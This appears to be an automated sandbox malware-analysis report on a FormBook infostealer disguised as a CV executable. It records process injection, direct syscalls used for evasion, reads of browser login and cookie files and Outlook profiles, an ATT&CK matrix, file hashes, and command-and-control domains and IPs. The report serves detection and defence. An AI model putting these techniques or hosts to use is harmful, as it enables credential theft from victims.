                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe - Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                    NtCreateFile: Direct from: 0x77872F0C
                    NtQueryVolumeInformationFile: Direct from: 0x77872E4C
                    NtDeviceIoControlFile: Direct from: 0x77872A0C
                    NtQuerySystemInformation: Direct from: 0x778747EC
                    NtAllocateVirtualMemory: Direct from: 0x77872B0C
                    NtOpenSection: Direct from: 0x77872D2C
                    NtAllocateVirtualMemory: Direct from: 0x77873BBC
                    NtQueryInformationToken: Direct from: 0x77872BCC
                    NtOpenFile: Direct from: 0x77872CEC
                    NtReadVirtualMemory: Direct from: 0x77872DAC
                    NtNotifyChangeKey: Direct from: 0x77873B4C
                    NtWriteVirtualMemory: Direct from: 0x77872D5C
                    NtSetInformationProcess: Direct from: 0x77872B7C
                    NtProtectVirtualMemory: Direct from: 0x77867A4E
                    NtAllocateVirtualMemory: Direct from: 0x77872B1C
                    NtResumeThread: Direct from: 0x778735CC
                    NtMapViewOfSection: Direct from: 0x77872C3C
                    NtReadFile: Direct from: 0x778729FC
                    NtQuerySystemInformation: Direct from: 0x77872D1C
                    NtDelayExecution: Direct from: 0x77872CFC
                    NtOpenKeyEx: Direct from: 0x77872ABC
                    NtAllocateVirtualMemory: Direct from: 0x7787480C
                    NtWriteVirtualMemory: Direct from: 0x7787482C
                    NtQueryInformationProcess: Direct from: 0x77872B46
                    NtResumeThread: Direct from: 0x77872EDC
                    NtProtectVirtualMemory: Direct from: 0x77872EBC
                    NtCreateUserProcess: Direct from: 0x7787363C
                    NtQueryAttributesFile: Direct from: 0x77872D8C
                    NtSetInformationThread: Direct from: 0x77866319
                    NtClose: Direct from: 0x77872A8C
                    NtSetInformationThread: Direct from: 0x77872A6C
                    NtCreateKey: Direct from: 0x77872B8C
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe - Memory written: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe - Section loaded: NULL target: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe - Section loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\netbtugc.exe - Section loaded: NULL target: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe protection: read write
                Source: C:\Windows\SysWOW64\netbtugc.exe - Section loaded: NULL target: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\netbtugc.exe - Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\netbtugc.exe - Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\netbtugc.exe - Thread register set: target process: 1368
                Source: C:\Windows\SysWOW64\netbtugc.exe - Thread APC queued: target process: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe - Process created: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe "C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe"
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe - Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
                Source: C:\Windows\SysWOW64\netbtugc.exe - Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: ptzMmYcrKro.exe, 00000003.00000002.33208493646.0000000001090000.00000002.00000001.00040000.00000000.sdmp, ptzMmYcrKro.exe, 00000003.00000000.29988674093.0000000001090000.00000002.00000001.00040000.00000000.sdmp, ptzMmYcrKro.exe, 00000005.00000000.30138475345.0000000000FC0000.00000002.00000001.00040000.00000000.sdmp - Binary or memory string: Shell_TrayWnd
                Source: ptzMmYcrKro.exe, 00000003.00000002.33208493646.0000000001090000.00000002.00000001.00040000.00000000.sdmp, ptzMmYcrKro.exe, 00000003.00000000.29988674093.0000000001090000.00000002.00000001.00040000.00000000.sdmp, ptzMmYcrKro.exe, 00000005.00000000.30138475345.0000000000FC0000.00000002.00000001.00040000.00000000.sdmp - Binary or memory string: Progman
                Source: ptzMmYcrKro.exe, 00000003.00000002.33208493646.0000000001090000.00000002.00000001.00040000.00000000.sdmp, ptzMmYcrKro.exe, 00000003.00000000.29988674093.0000000001090000.00000002.00000001.00040000.00000000.sdmp, ptzMmYcrKro.exe, 00000005.00000000.30138475345.0000000000FC0000.00000002.00000001.00040000.00000000.sdmp - Binary or memory string: Progmanlock
                Source: ptzMmYcrKro.exe, 00000003.00000002.33208493646.0000000001090000.00000002.00000001.00040000.00000000.sdmp, ptzMmYcrKro.exe, 00000003.00000000.29988674093.0000000001090000.00000002.00000001.00040000.00000000.sdmp, ptzMmYcrKro.exe, 00000005.00000000.30138475345.0000000000FC0000.00000002.00000001.00040000.00000000.sdmp - Binary or memory string: UProgram Manager
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe - Queries volume information: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe VolumeInformation
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe - Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match - File source: 2.2.Maryam Farokhi-PhD- CV-1403.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match - File source: 2.2.Maryam Farokhi-PhD- CV-1403.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match - File source: 00000002.00000002.30065570043.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match - File source: 00000002.00000002.30063798828.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match - File source: 00000004.00000002.33208901058.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match - File source: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match - File source: 00000005.00000002.33208331721.0000000000860000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match - File source: 00000004.00000002.33208982855.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match - File source: 00000003.00000002.33208941967.0000000002770000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match - File source: 00000002.00000002.30065763340.00000000013C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\netbtugc.exe - File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\netbtugc.exe - File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\netbtugc.exe - File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\netbtugc.exe - File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\netbtugc.exe - File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\netbtugc.exe - File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\netbtugc.exe - File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\netbtugc.exe - Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match - File source: 2.2.Maryam Farokhi-PhD- CV-1403.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match - File source: 2.2.Maryam Farokhi-PhD- CV-1403.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match - File source: 00000002.00000002.30065570043.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match - File source: 00000002.00000002.30063798828.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match - File source: 00000004.00000002.33208901058.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match - File source: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match - File source: 00000005.00000002.33208331721.0000000000860000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match - File source: 00000004.00000002.33208982855.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match - File source: 00000003.00000002.33208941967.0000000002770000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match - File source: 00000002.00000002.30065763340.00000000013C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 2 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                Behavior Graph ID: 1553733, Sample: Maryam Farokhi-PhD- CV-1403.exe, Startdate: 11/11/2024, Architecture: WINDOWS, Score: 100
                Signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for submitted file; Yara detected FormBook; 2 other signatures
                DNS/IP: www.kikaraofficial.xyz; www.ergeneescortg.xyz (Performs DNS queries to domains with low reputation); 28 other IPs or domains
                Process chain:
                • Maryam Farokhi-PhD- CV-1403.exe (started): dropped C:\...\Maryam Farokhi-PhD- CV-1403.exe.log, ASCII; Injects a PE file into a foreign processes
                • Maryam Farokhi-PhD- CV-1403.exe (started): Maps a DLL or memory area into another process
                • ptzMmYcrKro.exe (injected): Found direct / indirect Syscall (likely to bypass EDR)
                • netbtugc.exe (started): Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                • ptzMmYcrKro.exe (injected by netbtugc.exe): Found direct / indirect Syscall (likely to bypass EDR); DNS/IP: www.redex.fun 185.68.16.94, 49755, 49756, 49757, UKRAINE-ASUA, Ukraine; www.oriony.live 192.64.118.221, 49763, 49764, 49765, NAMECHEAP-NETUS, United States; 7 other IPs or domains
                • firefox.exe (started by netbtugc.exe)

                Source | Detection | Scanner | Label | Link
                Maryam Farokhi-PhD- CV-1403.exe | 37% | ReversingLabs | Win32.Trojan.Generic |
                Maryam Farokhi-PhD- CV-1403.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                Analysis ID:1553733
                                                                                                Start date and time:2024-11-11 16:55:26 +01:00
                                                                                                Joe Sandbox product:CloudBasic
                                                                                                Overall analysis duration:0h 16m 28s
                                                                                                Hypervisor based Inspection enabled:false
                                                                                                Report type:full
                                                                                                Cookbook file name:default.jbs
                                                                                                Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                Run name:Suspected Instruction Hammering
                                                                                                Number of analysed new started processes analysed:5
                                                                                                Number of new started drivers analysed:0
                                                                                                Number of existing processes analysed:0
                                                                                                Number of existing drivers analysed:0
                                                                                                Number of injected processes analysed:2
                                                                                                Technologies:
                                                                                                • HCA enabled
                                                                                                • EGA enabled
                                                                                                • AMSI enabled
                                                                                                Analysis Mode:default
                                                                                                Sample name:Maryam Farokhi-PhD- CV-1403.exe
                                                                                                Detection:MAL
                                                                                                Classification:mal100.troj.spyw.evad.winEXE@7/2@17/9
                                                                                                EGA Information:
                                                                                                • Successful, ratio: 75%
                                                                                                HCA Information:
                                                                                                • Successful, ratio: 91%
                                                                                                • Number of executed functions: 102
                                                                                                • Number of non-executed functions: 280
                                                                                                Cookbook Comments:
                                                                                                • Found application associated with file extension: .exe
                                                                                                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe
                                                                                                • Excluded domains from analysis (whitelisted): ecs.office.com
                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                • VT rate limit hit for: Maryam Farokhi-PhD- CV-1403.exe
Time      Type             Description
11:01:22  API Interceptor  20318873x Sleep call for process: netbtugc.exe modified
                                                                                                Process:C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):1216
                                                                                                Entropy (8bit):5.354384827676232
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:MLUE4K5E4K1Bs1qE4qXKDE4KhKMaKhPKIE4oKnKoZAE4KzD1E4x84j:MIHK5HK1Bs1qHiYHKh6oPtHoAhAHKzhp
                                                                                                MD5:511475387A5161D4052316C38F7FF282
                                                                                                SHA1:2CE71F7A372D6965DD42B71EEC5E8F81D43343B3
                                                                                                SHA-256:AD084A10414740C5054EDBCF76007E75F9E7456D3C7C5DA8865F0ECD491A6E61
                                                                                                SHA-512:E60E0218C46DF20260D81B7A1FBD69BF019C54E36A8ACDB74ADAB91A90BD8960ECC8E16F3872851119DA05E72787433DD3C54E099F9E6526342E05C38D5364C7
                                                                                                Malicious:true
                                                                                                Reputation:moderate, very likely benign file
                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\827465c25133ff582ff7ddaf85635407\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\374ae62ebbde44ef97c7e898f1fdb21b\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\b863adc9d550931e279ac7e2ee517d1f\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\10879c5bddb2dd2399e2098d
                                                                                                Process:C:\Windows\SysWOW64\netbtugc.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                                                                Category:dropped
                                                                                                Size (bytes):135168
                                                                                                Entropy (8bit):1.1142956103012707
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6kvjd:8t4n/9p/39J6hwNKRmqu+7VusEtrd
                                                                                                MD5:E3F9717F45BF5FFD0A761794A10A5BB5
                                                                                                SHA1:EBD823E350F725F29A7DE7971CD35D8C9A5616CC
                                                                                                SHA-256:D79535761C01E8372CCEB75F382E912990929624EEA5D7093A5A566BAE069C70
                                                                                                SHA-512:F12D2C7B70E898ABEFA35FEBBDC28D264FCA071D66106AC83F8FC58F40578387858F364C838E69FE8FC66645190E1CB2B4B63791DDF77955A1C376424611A85D
                                                                                                Malicious:false
                                                                                                Reputation:moderate, very likely benign file
                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Entropy (8bit):7.852838702037999
                                                                                                TrID:
                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                File name:Maryam Farokhi-PhD- CV-1403.exe
                                                                                                File size:747'008 bytes
                                                                                                MD5:de148dc1610a111af0b004e4d0d851a4
                                                                                                SHA1:5ac1d2f9bd4934240c7de727bf1e42c3eab7b257
                                                                                                SHA256:47b2857258f743ca87c19d38ebec95a1bc1c0490341ad9f08560529bfcb861e1
                                                                                                SHA512:8c61ca2734a14e33440a0b0e00e378f709b72e0d72211ffa7d0d73a0e3eb9b8e5f4480511254b0ef7c86a64bdd31989a656fa06d333343356ded3a539880fc71
                                                                                                SSDEEP:12288:MKq0LA8PMKj4j6kak/uXl4NzXe1j/QMSEiVOkXP4kCPa0:JA8zHwuez2QgiVFf4kC
                                                                                                TLSH:D2F41250B669E921C99A03794572C3BA87749ECEE121D3578FFAACE7BC07B357C04142
                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...=.1g..............0..0...4.......O... ...`....@.. ....................................@................................
                                                                                                Icon Hash:3e632cc46d6c4579
                                                                                                Entrypoint:0x4b4ff2
                                                                                                Entrypoint Section:.text
                                                                                                Digitally signed:false
                                                                                                Imagebase:0x400000
                                                                                                Subsystem:windows gui
                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                Time Stamp:0x6731E03D [Mon Nov 11 10:45:17 2024 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:
                                                                                                OS Version Major:4
                                                                                                OS Version Minor:0
                                                                                                File Version Major:4
                                                                                                File Version Minor:0
                                                                                                Subsystem Version Major:4
                                                                                                Subsystem Version Minor:0
                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                Instruction
                                                                                                jmp dword ptr [00402000h]
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb4f9d | 0x4f | .text |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb6000 | 0x3054 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xba000 | 0xc | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb2ca8 | 0x54 | .text |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x2000 | 0xb2ff8 | 0xb3000 | cb49f64289405c094bb4ca78e39a8258 | False | 0.9285636347765364 | data | 7.8582749593762085 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rsrc | 0xb6000 | 0x3054 | 0x3200 | 5cbeb5300bd3c955fcd27055a80506d3 | False | 0.9096875 | data | 7.6589108686779594 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0xba000 | 0xc | 0x200 | 113717bce31a60e5d646c64c61e94e57 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

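| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0xb60c8 | 0x2c58 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9821176885130374 |
| RT_GROUP_ICON | 0xb8d30 | 0x14 | data | | | 1.05 |
| RT_VERSION | 0xb8d54 | 0x2fa | data | | | 0.44750656167979 |
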
| DLL | Import |
|---|---|
| mscoree.dll | _CorExeMain |

| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-11-11T17:01:01.043848+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49746 | 85.159.66.93 | 80 | TCP |
| 2024-11-11T17:01:24.537105+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49750 | 3.33.130.190 | 80 | TCP |
| 2024-11-11T17:01:37.974891+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49754 | 3.33.130.190 | 80 | TCP |
| 2024-11-11T17:01:52.348543+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49758 | 185.68.16.94 | 80 | TCP |
| 2024-11-11T17:02:05.773871+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49762 | 199.59.243.227 | 80 | TCP |
| 2024-11-11T17:02:20.040926+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49766 | 192.64.118.221 | 80 | TCP |
| 2024-11-11T17:02:34.538500+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49770 | 154.23.184.95 | 80 | TCP |
| 2024-11-11T17:02:48.097162+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49774 | 13.248.169.48 | 80 | TCP |
| 2024-11-11T17:03:01.548411+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49778 | 3.33.130.190 | 80 | TCP |
| 2024-11-11T17:03:15.045527+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49782 | 3.33.130.190 | 80 | TCP |
| 2024-11-11T17:03:28.518727+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49787 | 3.33.130.190 | 80 | TCP |
| 2024-11-11T17:03:42.595445+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49791 | 45.79.252.94 | 80 | TCP |
| 2024-11-11T17:03:57.211155+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49795 | 43.156.106.109 | 80 | TCP |
| 2024-11-11T17:04:11.374664+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49799 | 3.33.130.190 | 80 | TCP |
| 2024-11-11T17:04:25.018148+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49803 | 104.21.56.13 | 80 | TCP |
| 2024-11-11T17:04:42.828035+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49804 | 85.159.66.93 | 80 | TCP |
| 2024-11-11T17:04:57.152971+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49808 | 3.33.130.190 | 80 | TCP |
| 2024-11-11T17:05:10.455044+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49812 | 3.33.130.190 | 80 | TCP |
| 2024-11-11T17:05:24.333100+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49816 | 185.68.16.94 | 80 | TCP |
| 2024-11-11T17:05:37.604291+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49820 | 199.59.243.227 | 80 | TCP |
| 2024-11-11T17:05:51.695304+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49824 | 192.64.118.221 | 80 | TCP |
| 2024-11-11T17:06:06.273646+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49828 | 154.23.184.95 | 80 | TCP |
| 2024-11-11T17:06:19.588475+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49832 | 13.248.169.48 | 80 | TCP |
